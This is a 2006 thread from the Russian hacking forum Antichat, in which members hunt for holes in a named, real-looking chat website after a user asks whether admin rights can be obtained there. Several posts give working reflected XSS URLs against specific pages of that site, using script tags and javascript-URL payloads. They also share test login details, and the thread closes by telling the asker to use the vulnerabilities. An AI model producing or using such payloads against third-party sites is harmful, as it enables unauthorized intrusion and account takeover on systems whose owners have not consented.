Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
17.05.2006, 12:17
|
|
Новичок
Регистрация: 17.05.2006
Сообщений: 13
Провел на форуме:
60703
Репутация:
7
|
|
Новый чат
Вот гулял по просторам инета и набрел вот на этот сайт http://sin-lab.net.ru
Они типа чат делают какой-то.
Так вот суть вопроса, у них типа пример чата расположен по адресу http://chat.ordenvlasti.ru/
Есть ли в нем дыры и можно ли получить права админа в нем? |
|
|
17.05.2006, 12:21
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Щас проверим..
PS для тех кто будет ковыряться:
Ник: tester
Пасс: 123456
Последний раз редактировалось sL(IP)--!(P.i.N.); 17.05.2006 в 12:27..
|
|
|
|
17.05.2006, 12:33
|
|
Участник форума
Регистрация: 02.04.2006
Сообщений: 273
Провел на форуме:
1269624
Репутация:
114
|
|
Вот вам XSS
Код:
http://chat.ordenvlasti.ru/showinfo.php?nick=%3Cscript%3Ealert(123456)%3C/script%3E
Последний раз редактировалось EST a1ien; 17.05.2006 в 12:47..
|
|
|
|
17.05.2006, 12:41
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
EST a1ien, Нет здесь xss, алерт не выпадает.. С чего ты взял что она там?
|
|
|
|
17.05.2006, 12:41
|
|
Новичок
Регистрация: 17.05.2006
Сообщений: 13
Провел на форуме:
60703
Репутация:
7
|
|
Сообщение от EST a1ien
Вот вам XSS
хм, а что с эим делать то?
при вставке в адресную строку открывается пустая страница 
|
|
|
|
17.05.2006, 12:53
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Через сообщения (Пм) ничего не получается, т.к. у каждого сообщения свой id..
В поисковике всё тоже пофиксено..
EST a1ien, нету там xss ещё раз говорю.. Я пробовал, там всё фильтруется.. Хватит писать не по теме, хочешь что то маленькое добавить, отредактируй тот пост...
|
|
|
|
17.05.2006, 12:58
|
|
Участник форума
Регистрация: 02.04.2006
Сообщений: 273
Провел на форуме:
1269624
Репутация:
114
|
|
Код:
http://chat.ordenvlasti.ru/showinfo.php?nick=<script>alert(123456)</script>
----------------
Чтобы вылетел алерт надо зайти в чат.
Последний раз редактировалось sL(IP)--!(P.i.N.); 17.05.2006 в 13:39..
|
|
|
|
17.05.2006, 13:46
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Расшарил xss в поисковике: Для выпада алерта, нужен вход в чат
_http://chat.ordenvlasti.ru/showinfo.php?nick=%3Cimage+style%3Dbackground%3Aur l%28javascript%3Aalert%28%2FSLIP%2F%29%29%3E
============
Ещё одна: Вход в чат необязателен
_http://chat.ordenvlasti.ru/error.php?msg=Пароль%20не%20верный!" ><image%20style=background:url(javascript:alert(/SLIP/))>
============
На главной странице, при просмотре анкеты админа.. Хоть и пишит что ник не зареген. но алерт то вылазит) Вход в сам чат необязателен
_http://chat.ordenvlasti.ru/showinfo.php?nick=DarkAG"><image%20style=backgroun d:url(javascript:alert(/SLIP/))>
Или так:
_http://chat.ordenvlasti.ru/showinfo.php?nick=DarkAG"><script>alert(/SLIP/)</script>
Последний раз редактировалось sL(IP)--!(P.i.N.); 17.05.2006 в 16:43..
Причина: добавил xss=)
|
|
|
|
17.05.2006, 13:50
|
|
Участник форума
Регистрация: 02.04.2006
Сообщений: 273
Провел на форуме:
1269624
Репутация:
114
|
|
Короче в этом посте я буду писать все найденные баги
1)
http://chat.ordenvlasti.ru/clans.php?clan=%3Cscript%3Ealert(123456)%3C/script%3E
Вход в чат необязателен. |
|
|
|
17.05.2006, 14:24
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Chaos-zone, тебе выложили уязвимости.. пользуйся)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
